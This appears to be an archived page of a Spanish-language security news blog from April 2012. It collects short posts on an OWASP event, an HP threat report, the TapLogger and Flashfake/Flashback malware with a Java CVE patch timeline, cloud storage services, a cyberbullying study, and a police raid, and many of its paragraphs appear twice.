OWASP Latam Tour Buenos Aires es parte del programa "OWASP Latam Tour" que tiene el objetivo turístico de crear conciencia acerca de los problemas de seguridad de aplicaciones en la región de América Latina, por lo que personas y organizaciones puedan tomar decisiones informadas sobre los riesgos verdaderos de seguridad. Cada uno es libre de participar en OWASP y todos nuestros materiales están disponibles bajo una licencia de software libre y abierto.
El evento es libre y gratuito bajo previa registracion.
Las personas que se hagan miembros de OWASP durante el Latam Tour gozaran de un importante descuento en la membresía. En lugar de abonar USD50 como es lo habitual, el costo de una membresía anual OWASP es de solamente USD20. Para ello, tienen que utilizar el código de descuento LATAM en la página oficial del evento.
Fuente: OWASP Latam Tour Buenos Aires
Algunos de los profesionales invitados son:
- Claudio Caracciolo
- Cristian Borghello
- Pablo Romanos
- Andres Riancho
- Sebastian Bortnik
- Hernan Racciatti
- Fabio Cerullo
- Ricardo Saenz
- Daniel Monastersky
- Mariano del Río
OWASP Latam Tour Buenos Aires es parte del programa "OWASP Latam Tour" que tiene el objetivo turístico de crear conciencia acerca de los problemas de seguridad de aplicaciones en la región de América Latina, por lo que personas y organizaciones puedan tomar decisiones informadas sobre los riesgos verdaderos de seguridad. Cada uno es libre de participar en OWASP y todos nuestros materiales están disponibles bajo una licencia de software libre y abierto.
El evento es libre y gratuito bajo previa registracion.
Las personas que se hagan miembros de OWASP durante el Latam Tour gozaran de un importante descuento en la membresía. En lugar de abonar USD50 como es lo habitual, el costo de una membresía anual OWASP es de solamente USD20. Para ello, tienen que utilizar el código de descuento LATAM en la página oficial del evento.
Fuente: OWASP Latam Tour Buenos Aires
HP identifica la sofisticación de los ataques de seguridad
HP publicó el Informe de los Principales Riesgos de Ciber Seguridad 2011, que identifica la creciente sofisticación y la gravedad de los ataques de seguridad y los riesgos resultantes.
El informe provee la información para ayudar a las empresas y gobiernos a comprender el escenario de amenazas y evaluar su actitud hacia la seguridad.
El informe señala también que las motivaciones de los hackers están cambiando continuamente debido a la creciente presencia de grupos hacktivistas, tales como Anonymous y LulzSec, quienes realizan ataques muy organizados en represalia por la maldad que perciben.
Además a la motivación cambiante, los avances en las técnicas de ataque han llevado al aumento de la tasa de "éxito" de las brechas de seguridad. Como resultado, las empresas y gobiernos han enfrentado con nuevos desafíos para evaluar y remediar riesgos.
Históricamente, el número de vulnerabilidades reveladas en un año señalaron el estado actual de la industria de la seguridad y ayudaron a las organizaciones a priorizar sus defensas.
Según el informe, solo el volumen de vulnerabilidades ya no es un indicador válido del escenarios de riesgos de seguridad. Mientras que las nuevas vulnerabilidades reportadas en aplicaciones comerciales siguen disminuyendo, un gran número de vulnerabilidades no son tenidas en cuenta, y por lo tanto no son reveladas a la amplia industria de la seguridad.
Un panorama de vulnerabilidades cambiante
La divulgación de vulnerabilidades nuevas en aplicaciones comerciales empezó a mostrar un lento declinar desde 2006, bajando cerca del 20 por ciento en 2011 desde el año anterior. Sin embargo, los datos del informe demuestran que esta disminución no implican una disminución del riesgo.
Esta disminución se debe a varios motivos, incluyendo el advenimiento de un mercado privado para compartir vulnerabilidades. Además, la proliferación de aplicaciones web hechas a medida, tales como sitios web de venta, han creado un mercado para explotaciones de vulnerabilidades únicas que necesitan habilidades avanzadas para localizar y resolver.
Los hallazgos claves del informe incluyen:
El informe provee la información para ayudar a las empresas y gobiernos a comprender el escenario de amenazas y evaluar su actitud hacia la seguridad.El informe señala también que las motivaciones de los hackers están cambiando continuamente debido a la creciente presencia de grupos hacktivistas, tales como Anonymous y LulzSec, quienes realizan ataques muy organizados en represalia por la maldad que perciben.
Además a la motivación cambiante, los avances en las técnicas de ataque han llevado al aumento de la tasa de "éxito" de las brechas de seguridad. Como resultado, las empresas y gobiernos han enfrentado con nuevos desafíos para evaluar y remediar riesgos.
Históricamente, el número de vulnerabilidades reveladas en un año señalaron el estado actual de la industria de la seguridad y ayudaron a las organizaciones a priorizar sus defensas.
Según el informe, solo el volumen de vulnerabilidades ya no es un indicador válido del escenarios de riesgos de seguridad. Mientras que las nuevas vulnerabilidades reportadas en aplicaciones comerciales siguen disminuyendo, un gran número de vulnerabilidades no son tenidas en cuenta, y por lo tanto no son reveladas a la amplia industria de la seguridad.
Un panorama de vulnerabilidades cambiante
La divulgación de vulnerabilidades nuevas en aplicaciones comerciales empezó a mostrar un lento declinar desde 2006, bajando cerca del 20 por ciento en 2011 desde el año anterior. Sin embargo, los datos del informe demuestran que esta disminución no implican una disminución del riesgo.
Esta disminución se debe a varios motivos, incluyendo el advenimiento de un mercado privado para compartir vulnerabilidades. Además, la proliferación de aplicaciones web hechas a medida, tales como sitios web de venta, han creado un mercado para explotaciones de vulnerabilidades únicas que necesitan habilidades avanzadas para localizar y resolver.
Los hallazgos claves del informe incluyen:
- Aunque el informe de de vulnerabilidades ha declinado, los ataques se han más que duplicado según midió HP TippingPoint Intrusion Prevention Systems (IPS) en la segunda mitad de 2011.
- Cerca del 24 por ciento de la nuevas vulnerabilidades divulgadas en aplicaciones comerciales durante 2011 tienen un indice de gravedad de 8 a 10. Estas vulnerabilidades pueden resultar en la ejecución remota de código, el tipo de ataque más peligroso.
- Casi el 36 por ciento de las vulnerabilidades están en aplicaciones web comerciales.
- Aproximadamente el 86 por ciento de las aplicaciones web son vulnerables a un ataque de inyección, que es cuando los hackers acceden a las bases de datos internas a través de un sitio web.
- Debido a la alta tasa de éxito, los toolkits de explotación web continuaron siendo populares en 2011. Estos marcos de trabajo "empaquetados" son comerciados o vendidos en Internet, permitiendo a los hackers acceder a los sistemas TI de las empresas y robar información sensible. Por ejemplo, el Kit Blackhole Exploit es usado por la mayoría de los cibercriminales, y ha alcanzado una tasa de infección usualmente alta de mas del 80 por ciento a finales de noviembre de 2011
Traducción: Raúl Batista - Segu-Info
Fuente: Help Net Security
TapLogger: troyano experimental capaz de determinar contraseñas basándose en los movimientos de dispositivos Android
Un equipo de investigadores de la Universidad Estatal de Pensilvania (PSU) e IBM ha desarrollado un troyano basado en Android que puede utilizar los sensores de movimiento del smartphone para romper las contraseñas.
Bautizado como TapLogger es una aplicación experimental que se basa en la premisa de que, al tocar en la pantalla táctil, se está interactuando con la misma, pero también estamos moviendo todo el dispositivo. Así que si presionamos un botón en la esquina superior derecha, el teléfono en realidad se moverá en esa dirección un poco, y ese movimiento sutil es leído por el acelerómetro y otros sensores integrados del el dispositivo.
Los datos del acelerómetro y de los sensores de orientación no están protegidos por el modelo de seguridad de Android, y esto significa que están expuestos a cualquier aplicación, independientemente de sus permisos en el sistema.
Tenéis mayor detalle en el documento que fue presentado durante la Conferencia de ACM sobre Seguridad y Privacidad en Redes Inalámbricas y Móviles.
No es la primera vez que se diseña un troyano de estas características. En 2011 apareció TouchLogger, una aplicación para Android que tenía en cuenta un menor número de variables y no incluía entrenamiento, entre otras muchas diferencias. Más tarde, el mismo año, aparecería otra para iPhone, que hacía uso del acelerómetro y el giróscopo para averiguar qué palabras habían sido pulsadas en un teclado cercano teniendo en cuenta, a grandes rasgos, si se había pulsado una tecla "de la izquierda" del teclado o "de la derecha".
Fuente: HackPlayers e Hispasec
Bautizado como TapLogger es una aplicación experimental que se basa en la premisa de que, al tocar en la pantalla táctil, se está interactuando con la misma, pero también estamos moviendo todo el dispositivo. Así que si presionamos un botón en la esquina superior derecha, el teléfono en realidad se moverá en esa dirección un poco, y ese movimiento sutil es leído por el acelerómetro y otros sensores integrados del el dispositivo.Los datos del acelerómetro y de los sensores de orientación no están protegidos por el modelo de seguridad de Android, y esto significa que están expuestos a cualquier aplicación, independientemente de sus permisos en el sistema.
Tenéis mayor detalle en el documento que fue presentado durante la Conferencia de ACM sobre Seguridad y Privacidad en Redes Inalámbricas y Móviles.
No es la primera vez que se diseña un troyano de estas características. En 2011 apareció TouchLogger, una aplicación para Android que tenía en cuenta un menor número de variables y no incluía entrenamiento, entre otras muchas diferencias. Más tarde, el mismo año, aparecería otra para iPhone, que hacía uso del acelerómetro y el giróscopo para averiguar qué palabras habían sido pulsadas en un teclado cercano teniendo en cuenta, a grandes rasgos, si se había pulsado una tecla "de la izquierda" del teclado o "de la derecha".
Fuente: HackPlayers e Hispasec
Microsoft SkyDrive ¿Cómo funciona?
Con la salida de SkyDrive de Microsoft para OS X y Windows, ponemos a examen su aplicación y la comparamos con su competencia más directa.
Cuando en 2008 Microsoft decidió llevar los programas más utilizados de Windows a la nube bajo el nombre de “live”, creó un sistema para almacenar archivos en internet. Originalmente se llamó Windows Live Folders, aunque poco después paso a nombrarse con su actual denominación.
El sistema de almacenaje no es tan diferente como el de DropBox o Box.net, pero su éxito se basó en dotar a cada usuario de Hotmail con un espacio de 25 Gb. Tan solo era necesario acceder con nuestra cuenta de Windows ID (Hotmail, MSN). En la actualidad, el servicio se ha perfeccionado, incluyendo otras características como la fusión con otros programas de la suite Live (Photos, Favorites, Groups) y la inclusión de Office Web App: los programas más utilizados de Microsoft Office adaptados a la nube.
Si tenías Skydrive, debes verificar tu cuenta para seguir obteniendo los 25GB gratuitos, ya que a partir de ahora el espacio pasa a ser de 7GB para las nuevas cuentas. Tan solo debes acceder a las opciones de administración del almacenamiento y verificar que utilizas esta cuenta con frecuencia.
Fuente: Apple Weblog
Cuando en 2008 Microsoft decidió llevar los programas más utilizados de Windows a la nube bajo el nombre de “live”, creó un sistema para almacenar archivos en internet. Originalmente se llamó Windows Live Folders, aunque poco después paso a nombrarse con su actual denominación.
El sistema de almacenaje no es tan diferente como el de DropBox o Box.net, pero su éxito se basó en dotar a cada usuario de Hotmail con un espacio de 25 Gb. Tan solo era necesario acceder con nuestra cuenta de Windows ID (Hotmail, MSN). En la actualidad, el servicio se ha perfeccionado, incluyendo otras características como la fusión con otros programas de la suite Live (Photos, Favorites, Groups) y la inclusión de Office Web App: los programas más utilizados de Microsoft Office adaptados a la nube.
Si tenías Skydrive, debes verificar tu cuenta para seguir obteniendo los 25GB gratuitos, ya que a partir de ahora el espacio pasa a ser de 7GB para las nuevas cuentas. Tan solo debes acceder a las opciones de administración del almacenamiento y verificar que utilizas esta cuenta con frecuencia.
Fuente: Apple Weblog
24 abr 2012
Google Drive filtrados por Google Francia
Debe faltar muy poco para el anuncio oficial, pero bueno, aquí están los detalles de lo que será el servicio de almacenamiento en la nube ofrecido por Google, gracias a una equivocación cometida por el equipo de Francia de la compañía, que publicó accidentalmente el anuncio en su blog oficial.
Gracias a la magia de Google Translate, la traducción del francés estuvo lista en segundos (casi tan rápido como lo que se demoraron en Francia en eliminar el post), y los detalles son los siguientes:
Gracias a la magia de Google Translate, la traducción del francés estuvo lista en segundos (casi tan rápido como lo que se demoraron en Francia en eliminar el post), y los detalles son los siguientes:
- Los usuarios tendrán 5 GB de almacenamiento gratis
- Se puede adquirir espacio adicional por USD$4 al mes por 20 GB, hasta un máximo de 16 TB
- Google Drive estará integrado en Google Docs, "permitiéndote trabajar en tiempo real con colegas en documentos, hojas de cálculo y presentaciones. Agrega y responde comentarios en cualquier formato (PDF, imagen, grabación, etc) y manténte informaco cuando otras personas comentan o quieren compartir documentos contigo". Google lo llama la "evolución de Google Docs".
- Enfoque en la búsqueda: Además de buscar por palabras clave, Google Drive tendrá soporte para OCR para leer lo que hay en documentos escaneados. También podrá reconocer imágenes, "si subes una foto de la Torre Eiffel, la próxima vez que busques el término 'Torre Eiffel', la imagen aparecerá en los resultados".
- Aceptará 30 tipos diferentes de archivos, incluyendo Photoshop, Illustrator y video en HD, "incluso si no tienes el software correcto instalado en tu computador".
- Se lanzarán aplicaciones para PC, Mac y Android hoy. Más adelante saldrá la de iOS
- Seguridad: Los archivos serán cifrados en la transferencia entre el navegador y los servidores de Google.
Actualización: Google Drive, se venía comentando desde hace tiempo y ofrece hasta 5GB de almacenamiento gratuito en la red. Lo interesante es su integración con herramientas de Google como Docs, lo que permite tener una copia de los documentos que hasta ahora teníamos en línea, en nuestra computadora y podremos editarlos aún cuando estamos offline (utilizando algún procesador de textos instalado en nuestra computadora).
Para aquellos apurados que no dudan en migrar sin leer, les recomiendo mirar con atención lo remarcado en estas licencias. Lo que traducido sería algo así como:
Al subir contenido o al enviarlo por otros medios a nuestros Servicios, concedes a Google (y a sus colaboradores) una licencia mundial para usar, alojar, almacenar, reproducir, modificar, crear obras derivadas (por ejemplo, las que resulten de la traducción, la adaptación u otros cambios que realicemos para que tu contenido se adapte mejor a nuestros Servicios), comunicar, publicar, ejecutar o mostrar públicamente y distribuir dicho contenido.Fuente: FayerWayer y Perfil
Masiva explotación de OS X. ¿Por qué ahora?
¡Por su cuota de mercado! Es una respuesta fácil, pero no es la única.
En 2011, se estimaba que Apple tenía una cuota de más del 5% en el mercado mundial de ordenadores de escritorio y portátiles. Esta era una significativa barrera que había que romper. La cuota de Linux se mantiene en menos del 2%, y la de Google ChromeOS es mucho menor. Este pico alcanzado después de 15 años coincidió con la primera explotación del agresivo mercado de antivirus fraudulentos (FakeAV/Roqueware) que apunta a los ordenadores Apple, que descubrimos y publicamos en abril de 2011, Una rara campaña de publicidad para antivirus fraudulentos y en mayo de ese mismo año, Campaña de malware fraudulento amenaza a los usuarios de Mac, lo que ya no parece ser una mera coincidencia.
Asimismo, es posible que esta demora de los programas maliciosos para Apple no tenga nada que ver con que no había exploits para Apple, o con que el sistema Mac OS X está especialmente fortalecido. El “Mes de los virus para Apple” en 2007 demostró que el sistema Mac OS X y el código de soporte están llenos de vulnerabilidades. Safari, QuickTime y otros programas en dispositivos Apple suelen ser vulnerados en los concursos pwnage, pero los ciberdelincuentes no le dieron importancia sino hasta el año pasado.
Hasta ahora, todavía no sabemos quién es responsable del fraudulento programa Flash (Flashfake), así que no tenemos certeza si son los mismos que de los programas antivirus fraudulentos para Mac OS X. La suposición de que se trata de ciberdelincuentes de Europa oriental es, por el momento, una alternativa bastante posible. Existen en esta región grupos conocidos por lucrar con avisos colocados en el tráfico secuestrado desde los motores de búsqueda. Sin embargo, no creemos que ninguna información confidencial esté en riesgo. Las URLs de propagación del exploit que conocemos sólo apuntan a los usuarios de Mac. Estos factores limitan las necesidades técnicas y operativas de una pandilla de ciberdelincuentes con fines de lucro.
De cierta forma, su actividad se parecía a la de los grupos Koobface o Tdss. No han cometido delitos financieros relevantes como para atraer la atención de las autoridades, y sus programas maliciosos contienen hooks y otros códigos para cometer sofisticados delitos bancarios en vez de secuestrar el tráfico desde los motores de búsqueda, pero es muy posible que intentaran obtener una multitud de pequeñas ganancias monetarias. Por otra parte, por suerte, Apple no les ha dado suficiente tiempo a estos rufianes para prepararse. Esta puede ser una actividad muy lucrativa, pues se estima que los dueños de Koobface se esfumaron con millones en los bolsillos después de que Facebook neutralizara sus operaciones como resultado de una investigación. Pero según los registros de los dominios que hemos analizado, estos individuos no son muy públicos y ocultan su identidad mientras secuestran el tráfico desde los motores de búsqueda.
Estos programas maliciosos inyectan varios hooks en las aplicaciones en ejecución, muy similar a lo que hacen ZeuS, SpyEye y otros programas espía. Si se los usara para cometer delitos bancarios, los dueños de esta red zombi tendrían que recurrir a mulas de dinero y otros cómplices para lavar el dinero que roban, lo que haría que el grupo creciera, atrayendo así la atención de las autoridades.
En la parte tecnológica, Java es una pieza importante del rompecabezas. Aunque el troyano se llama Flashfake, porque a los usuarios se les convencía para que instalaran un programa malicioso que aparecía como una actualización de Adobe Flash, sus últimas versiones se instalaban a través de lado del cliente Java.
Se apuntó a tres vulnerabilidades con exploits dirigidas a lado del cliente, ninguna de las cuales era 0-Day, lo que parece haber dificultado su adquisición. Además, esta combinación fue muy conveniente para sus operadores. Resulta interesante notar el tiempo transcurrido desde la actualización original de seguridad de Oracle Java hasta la actualización de seguridad de Appla Java, y en qué momento aparece la publicación de la investigación de vulneración de la seguridad. Y, ¿cuándo se publicaron los módulos del exploit de código abierto Metasploit que amenazaban a las correspondientes vulnerabilidades en Java? Los periodos de tiempo pueden parecer alarmantes.
No se trata de exploits 0_day, pero Apple simplemente no ha publicado los respectivos parches, dejando a sus clientes expuestos.
Prefiero llamarlo la apuesta del “usuario terriblemente confundido al que se le presenta el diálogo ‘¿Quieres confiar en este applet?’ y ejecutará cualquier cosa que le presentes”. Comenzó como parte del módulo del exploit Metasploit el 27-01-2012. Básicamente, le presentan al usuario un archivo que él cree es una actualización de Java proveniente de la misma Apple Inc, en la que confía para ejecutar cualquier acción en su equipo.
Después, el descargador se comunica con un par de sitios para registrar y descargar nuevos componentes de Flasfake. A su vez, estos componentes capturan el UUID del sistema y el timestamp, para después autogenerar mediante un algoritmo codificado una serie de dominios C2, a la vez que mantiene una lista de dominios con hard-code. Un par de los más recientes componentes se inyecta en los procesos en ejecución en el sistema, bloqueando la funcionalidad de los programas y secuestrando el tráfico, de forma muy similar a los anteriores programas maliciosos TDS.
Fuente: Viruslist
En 2011, se estimaba que Apple tenía una cuota de más del 5% en el mercado mundial de ordenadores de escritorio y portátiles. Esta era una significativa barrera que había que romper. La cuota de Linux se mantiene en menos del 2%, y la de Google ChromeOS es mucho menor. Este pico alcanzado después de 15 años coincidió con la primera explotación del agresivo mercado de antivirus fraudulentos (FakeAV/Roqueware) que apunta a los ordenadores Apple, que descubrimos y publicamos en abril de 2011, Una rara campaña de publicidad para antivirus fraudulentos y en mayo de ese mismo año, Campaña de malware fraudulento amenaza a los usuarios de Mac, lo que ya no parece ser una mera coincidencia.
Asimismo, es posible que esta demora de los programas maliciosos para Apple no tenga nada que ver con que no había exploits para Apple, o con que el sistema Mac OS X está especialmente fortalecido. El “Mes de los virus para Apple” en 2007 demostró que el sistema Mac OS X y el código de soporte están llenos de vulnerabilidades. Safari, QuickTime y otros programas en dispositivos Apple suelen ser vulnerados en los concursos pwnage, pero los ciberdelincuentes no le dieron importancia sino hasta el año pasado.
Hasta ahora, todavía no sabemos quién es responsable del fraudulento programa Flash (Flashfake), así que no tenemos certeza si son los mismos que de los programas antivirus fraudulentos para Mac OS X. La suposición de que se trata de ciberdelincuentes de Europa oriental es, por el momento, una alternativa bastante posible. Existen en esta región grupos conocidos por lucrar con avisos colocados en el tráfico secuestrado desde los motores de búsqueda. Sin embargo, no creemos que ninguna información confidencial esté en riesgo. Las URLs de propagación del exploit que conocemos sólo apuntan a los usuarios de Mac. Estos factores limitan las necesidades técnicas y operativas de una pandilla de ciberdelincuentes con fines de lucro.
De cierta forma, su actividad se parecía a la de los grupos Koobface o Tdss. No han cometido delitos financieros relevantes como para atraer la atención de las autoridades, y sus programas maliciosos contienen hooks y otros códigos para cometer sofisticados delitos bancarios en vez de secuestrar el tráfico desde los motores de búsqueda, pero es muy posible que intentaran obtener una multitud de pequeñas ganancias monetarias. Por otra parte, por suerte, Apple no les ha dado suficiente tiempo a estos rufianes para prepararse. Esta puede ser una actividad muy lucrativa, pues se estima que los dueños de Koobface se esfumaron con millones en los bolsillos después de que Facebook neutralizara sus operaciones como resultado de una investigación. Pero según los registros de los dominios que hemos analizado, estos individuos no son muy públicos y ocultan su identidad mientras secuestran el tráfico desde los motores de búsqueda.
Estos programas maliciosos inyectan varios hooks en las aplicaciones en ejecución, muy similar a lo que hacen ZeuS, SpyEye y otros programas espía. Si se los usara para cometer delitos bancarios, los dueños de esta red zombi tendrían que recurrir a mulas de dinero y otros cómplices para lavar el dinero que roban, lo que haría que el grupo creciera, atrayendo así la atención de las autoridades.
En la parte tecnológica, Java es una pieza importante del rompecabezas. Aunque el troyano se llama Flashfake, porque a los usuarios se les convencía para que instalaran un programa malicioso que aparecía como una actualización de Adobe Flash, sus últimas versiones se instalaban a través de lado del cliente Java.
Se apuntó a tres vulnerabilidades con exploits dirigidas a lado del cliente, ninguna de las cuales era 0-Day, lo que parece haber dificultado su adquisición. Además, esta combinación fue muy conveniente para sus operadores. Resulta interesante notar el tiempo transcurrido desde la actualización original de seguridad de Oracle Java hasta la actualización de seguridad de Appla Java, y en qué momento aparece la publicación de la investigación de vulneración de la seguridad. Y, ¿cuándo se publicaron los módulos del exploit de código abierto Metasploit que amenazaban a las correspondientes vulnerabilidades en Java? Los periodos de tiempo pueden parecer alarmantes.
No se trata de exploits 0_day, pero Apple simplemente no ha publicado los respectivos parches, dejando a sus clientes expuestos.
- CVE-2012-0507
- 2012-02-15 Oracle: publica los parches para la vulnerabilidad Atomic Reference Array
- 2012-03-10 Primer Itw exploit dirigido a la vulnerabilidad.
- 2012-03-30 Los desarrolladores de Metasploit: añaden el módulo del exploit Java atomic reference array
- 2012-04-03: Apple parchea su código
- CVE-2011-3544
- 2011-05-12: se le informa al fabricante
- 2011-11-18: Oracle parchea su Java SE
- 2011-11-30 Los desarrolladores de Metasploit añaden el módulo "Rhino exploit"
- Krebs informa sobre un sitio operativo BlackHole con el nuevo exploit Java
- 2012-3-29: Parche de Apple
- CVE-2008-5353: Deserialización de objetos del calendario
- 2008-08-01 Se informa a Sun sobre la primera instancia de la vulnerabilidad
- 2009-05-15: Apple parchra el código de MacOSX
- 2009-06-16 Los desarrolladores de Metasploit añaden el exploit Java deserialization
- También aparece en esta lista un débil exploit descrito como un applet firmado usado como truco de ingeniería social.
Prefiero llamarlo la apuesta del “usuario terriblemente confundido al que se le presenta el diálogo ‘¿Quieres confiar en este applet?’ y ejecutará cualquier cosa que le presentes”. Comenzó como parte del módulo del exploit Metasploit el 27-01-2012. Básicamente, le presentan al usuario un archivo que él cree es una actualización de Java proveniente de la misma Apple Inc, en la que confía para ejecutar cualquier acción en su equipo.
Después, el descargador se comunica con un par de sitios para registrar y descargar nuevos componentes de Flasfake. A su vez, estos componentes capturan el UUID del sistema y el timestamp, para después autogenerar mediante un algoritmo codificado una serie de dominios C2, a la vez que mantiene una lista de dominios con hard-code. Un par de los más recientes componentes se inyecta en los procesos en ejecución en el sistema, bloqueando la funcionalidad de los programas y secuestrando el tráfico, de forma muy similar a los anteriores programas maliciosos TDS.
Fuente: Viruslist
Entrevista al "hombre más odiado de internet"
Este resumen no está disponible. Haz clic
aquí para ver la publicación.
Abuso escolar y Cyberbullying no es lo mismo
El abuso escolar tradicional se asocia, por lo general, con un desequilibrio de fuerzas entre víctima y agresor, la búsqueda activa de una víctima y una agresión concreta. Un estudio muestra que el ciberacoso no responde a estos patrones, y que en él los roles de acosador, víctima y espectador son intercambiables.
Un trabajo de Jennifer Shapka, profesora asociada en la Facultad de Educación de la Universidad de Columbia Británica (Canadá), que estudió a 17 mil alumnos de Vancouver entre los grados 8º y 12º, con un seguimiento que involucró a 733 estudiantes de entre 10 y 18 años de edad, muestra que los niños y los jóvenes no perciben del mismo modo el ciberacoso con las formas tradicionales de abuso escolar.
Por esta razón, Shapka sostiene que "no deberíamos asumir que las intervenciones existentes (para combatir el problema) tienen sentido cuando las agresiones son en línea".
Los resultados muestran que entre el 25 y el 30 por ciento de los jóvenes reportan haber experimentado o tomado parte en actos de ciberacoso, comparados con un 12 por ciento que dicen haber experimentado o tomado parte en alguna forma de abuso tradicional. No obstante, "los jóvenes afirman que el 95 por ciento de lo que ocurre en línea fue "en broma", y sólo el restante 5 por ciento "para hacer daño", dice Shapka.
"Está claro que los jóvenes subestiman el nivel de daño asociado al ciberacoso", concluye la investigadora, y explica que "los estudiantes deben ser educados para comprender que ese "en broma" tiene graves implicancias".
Ser victimizado en línea puede tener consecuencias serias para la salud mental, el bienestar durante el desarrollo y los logros académicos, dice Shapka. El casos extremos han sido reportados suicidios.
De este modo, los programas y campañas para hacer de Internet un espacio seguro necesitan ser ajustados a esta realidad, teniendo en cuenta la percepción real que tienen los niños y los jóvenes sobre sus acciones "virtuales" y las que ocurren en "la vida real".
Fuente: Síntesis Educativa
Un trabajo de Jennifer Shapka, profesora asociada en la Facultad de Educación de la Universidad de Columbia Británica (Canadá), que estudió a 17 mil alumnos de Vancouver entre los grados 8º y 12º, con un seguimiento que involucró a 733 estudiantes de entre 10 y 18 años de edad, muestra que los niños y los jóvenes no perciben del mismo modo el ciberacoso con las formas tradicionales de abuso escolar.
Por esta razón, Shapka sostiene que "no deberíamos asumir que las intervenciones existentes (para combatir el problema) tienen sentido cuando las agresiones son en línea".
Los resultados muestran que entre el 25 y el 30 por ciento de los jóvenes reportan haber experimentado o tomado parte en actos de ciberacoso, comparados con un 12 por ciento que dicen haber experimentado o tomado parte en alguna forma de abuso tradicional. No obstante, "los jóvenes afirman que el 95 por ciento de lo que ocurre en línea fue "en broma", y sólo el restante 5 por ciento "para hacer daño", dice Shapka.
"Está claro que los jóvenes subestiman el nivel de daño asociado al ciberacoso", concluye la investigadora, y explica que "los estudiantes deben ser educados para comprender que ese "en broma" tiene graves implicancias".
Ser victimizado en línea puede tener consecuencias serias para la salud mental, el bienestar durante el desarrollo y los logros académicos, dice Shapka. El casos extremos han sido reportados suicidios.
De este modo, los programas y campañas para hacer de Internet un espacio seguro necesitan ser ajustados a esta realidad, teniendo en cuenta la percepción real que tienen los niños y los jóvenes sobre sus acciones "virtuales" y las que ocurren en "la vida real".
Fuente: Síntesis Educativa
Argentina: allanan la casa de un pedófilo y secuestran material pornográfico
Las acciones de un pedófilo que distribuía pornografía infantil desde una casa del barrio porteño de Boedo fueron desbaratadas en las últimas horas, a través de una investigación que había iniciado la policía alemana.
Así lo informó hoy la Policía Metropolitana, que participó de la investigación que comenzó en enero pasado luego de un alerta de la policía alemana que había "detectado que un usuario descargaba y compartía en demasía videos pornográficos de menores", precisó la policía porteña.
La Metropolitana confirmó que el rastreo del pedófilo los llevó al allanar una vivienda en el barrio de Boedo, aunque por el momento nadie quedó detenido, sino que "se identificaron a todos los ocupantes de la vivienda, quienes serán llamados a declarar".
Además, en el lugar se secuestraron “DVDs, tarjetas de memoria, discos rígidos y computadoras con material pornográfico infantil", detalló la Policía Metropolitana.
El acusado utilizaba el programa de intercambios de archivos 'Emule' para descargar y compartir imágenes pornográficas de menores. Luego, publicaba las fotos y videos en páginas de acceso público donde podían ser vistas y descargadas por todas las personas que accedían al sitio, precisó el informe difundido por la Metropolitana.
Cuando determinaron que el usuario realizaba esa actividad desde Argentina, la fuerza alemana dio aviso a Interpol que a su vez derivó el caso a la justicia argentina.
Fuente: Clarín
Así lo informó hoy la Policía Metropolitana, que participó de la investigación que comenzó en enero pasado luego de un alerta de la policía alemana que había "detectado que un usuario descargaba y compartía en demasía videos pornográficos de menores", precisó la policía porteña.
La Metropolitana confirmó que el rastreo del pedófilo los llevó al allanar una vivienda en el barrio de Boedo, aunque por el momento nadie quedó detenido, sino que "se identificaron a todos los ocupantes de la vivienda, quienes serán llamados a declarar".
Además, en el lugar se secuestraron “DVDs, tarjetas de memoria, discos rígidos y computadoras con material pornográfico infantil", detalló la Policía Metropolitana.
El acusado utilizaba el programa de intercambios de archivos 'Emule' para descargar y compartir imágenes pornográficas de menores. Luego, publicaba las fotos y videos en páginas de acceso público donde podían ser vistas y descargadas por todas las personas que accedían al sitio, precisó el informe difundido por la Metropolitana.
Cuando determinaron que el usuario realizaba esa actividad desde Argentina, la fuerza alemana dio aviso a Interpol que a su vez derivó el caso a la justicia argentina.
Fuente: Clarín
Libros de Criptografía para descargar
No hay mucho más para agregar y sólo queda el seguir el enlace a un sitio que dará que hablar como este otro. Si bien de algunos parecen faltar enlaces, la mayoría de ellos pueden ser descargados sin problema.
Infectados con #FlashBack Trojan son más de lo calculado
Las noticias reportaron que el número de equipos Mac OS X infectados por FlashBack Trojan llegó hasta los 600.000, y que a día de de hoy decrece con cierta velocidad, después de los esfuerzos de Apple, la comunidad de empresas antimalware y el ecosistema de desarrolladores de software que están tomando las medidas a su alcance, como el caso de Firefox.
Sin embargo, desde Intego han hecho una interesante reflexión que ha levantado las alarmas en cuanto al tamaño de la infección conseguida, al analizar el funcionamiento de la búsqueda del Panel de Control (C&C) de la botnet por parte de sus víctimas, que es lo que se está utilizando para calcular los tamaños.
FlashBack Trojan lleva en su código un sistema de búsqueda del C&C basado en la generación de un dominio nuevo cada día. Este dominio, como se puede ver en el gráfico generado por Symantec, es buscado en varios Top Level Domains (TLD), es decir, en .net, .com, etcétera.
Cuando un equipo encuentra el dominio en el TLD .net, no continúa buscando en los otros. El error ha sido generado porque las cuentas se han basado siempre en que se conectaba a todos los TLD, con lo que bastaba con monitorizar uno de ellos para tener el número total de los infectados.
Dr. Web, la primera firma que estimó el tamaño de la botnet, ha confirmado este comportamiento por parte de los bots, por lo que parece que las previsiones de que ahora mismo estemos en algo menos de 30.000 equipos infectados parecen erróneas, y el número total de equipos infectados puede haber sido mucho mayor que los 600.000 reportados incialmente. En cualquier caso, toma precauciones para no ser uno de ellos, sean ellos cuantos sean.
Fuente: Seguridad Apple
Sin embargo, desde Intego han hecho una interesante reflexión que ha levantado las alarmas en cuanto al tamaño de la infección conseguida, al analizar el funcionamiento de la búsqueda del Panel de Control (C&C) de la botnet por parte de sus víctimas, que es lo que se está utilizando para calcular los tamaños.
FlashBack Trojan lleva en su código un sistema de búsqueda del C&C basado en la generación de un dominio nuevo cada día. Este dominio, como se puede ver en el gráfico generado por Symantec, es buscado en varios Top Level Domains (TLD), es decir, en .net, .com, etcétera.
Fuente: Seguridad Apple
23 abr 2012
Entrevista revista Information Technology sobre Cloud Security Alliance
Durante este mes la revista Information Technology ha publicado una serie de artículos sobre la privacidad, los entornos virtuales y la migración a Cloud Computing. En este contexto me han realizado una entrevista sobre la importancia de la nube y sobre los desafíos que afronta el mercado local cuando se intenta migrar: la necesidad de confidencialidad, los problemas legales, la disponibilidad de la información, las velocidades de conexión, la falta de servicios acorde, etc.
Durante la entrevista también he presentado el capítulo argentino de Cloud Security Alliance del cual tengo el placer de formar parte y al cual invito a participar si estas interesado en la tecnología de los próximos 10 años.
Finalmente te pido responder sólo cuatro preguntas sobre el tema para una encuesta que pronto publicaremos y esperamos sea el puntapié inicial para conocer más sobre el estado de Cloud Computing en América Latina: http://segu.info/encc
A continuación dejo la entrevista y agradezco a Alejandro por haber pensando en mí (Revista Information Technology (todos los derechos reservados):
Cristian de la Redacción de Segu-Info
